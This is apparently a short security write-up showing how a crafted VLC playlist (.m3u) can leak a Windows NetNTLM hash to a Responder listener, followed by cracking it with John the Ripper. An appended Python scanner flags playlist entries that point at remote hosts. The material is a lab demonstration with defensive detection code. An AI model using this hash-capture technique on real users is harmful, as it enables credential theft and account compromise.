Hi readers, since one of my idols tweeted some time back that it is possible to get a NetNTLM hash using a .m3u file, I decided to try it out and do a simple write-up.
The figure below shows the yappare tweet:
In order to get the NetNTLM hash, we need to create a .m3u (playlist) file. As can be seen in the figure below, the .m3u file contains a path to a song on my desktop and the Responder IP address.
P.S: Your playlist (.m3u) can play songs via URL.
Once the file is opened in VLC player, VLC player will play the first song. Once the song ends or the next button is clicked, the author is able to receive the NetNTLM hash.
Upon creating the file (.m3u), do ensure you have downloaded Responder. In order to run Responder, just insert the following command into the terminal:
./Responder.py -I eth0
The figure below shows that Responder is listening for events:
Once Responder is listening for events, open the created file with VLC player. Once the song ends or the next button is clicked, VLC player will show its users the following error message.
While the error message is shown to users, the auditor has received the NetNTLM hash, as shown in the figure below:
With the received NetNTLM hash, an attacker can run John the Ripper in order to crack the password. The figure below shows that my Win 10 (Virtual Machine) password is 1337.
P.S: The password was set just for this write-up 😉.
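
For defenders, a check that flags playlist entries pointing at a remote host before the file is opened; this is an added example, not code from the original post or from the VLC or Responder projects. It assumes the remote entry is a UNC path or an smb:// or file:// URL with a host (the post's figure is not reproduced here), and `SAMPLE_M3U`, `remote_host` and `scan_playlist` are names made up for this example.

```python
import re
from urllib.parse import urlsplit

# Constructed sample playlist; 192.0.2.10 is a documentation-only address.
SAMPLE_M3U = r"""#EXTM3U
#EXTINF:215,Local track
C:\Users\user\Desktop\song.mp3
\\192.0.2.10\share\next.mp3
smb://192.0.2.10/share/other.mp3
file://192.0.2.10/share/third.mp3
file:///C:/Users/user/Music/ok.mp3
https://example.com/stream.mp3
"""

# \\host\share or //host/share; "\\?\" and "\\.\" are local device prefixes, not hosts.
UNC_RE = re.compile(r"^(?:\\\\|//)([^\\/?.][^\\/]*)[\\/]")

def remote_host(entry):
    """Return the host an entry would make the player reach over SMB, else None."""
    entry = entry.strip()
    match = UNC_RE.match(entry)
    if match:
        return match.group(1)
    try:
        parts = urlsplit(entry)
    except ValueError:          # malformed URL, nothing to resolve
        return None
    # Assumption: only smb:// and file://host/ entries are treated as SMB references.
    if parts.scheme.lower() in ("smb", "file") and parts.hostname:
        if parts.hostname.lower() != "localhost":
            return parts.hostname
    return None

def scan_playlist(text):
    """Return (line number, host, entry) for every entry that names a remote host."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue            # blank line or #EXTM3U / #EXTINF directive
        host = remote_host(line)
        if host:
            findings.append((lineno, host, line.strip()))
    return findings

if __name__ == "__main__":
    for lineno, host, entry in scan_playlist(SAMPLE_M3U):
        print(f"line {lineno}: references remote host {host}: {entry}")
```

Hosts reported by the scan can be compared against an allowlist of known file servers; blocking outbound SMB at the perimeter covers playlists that are never scanned.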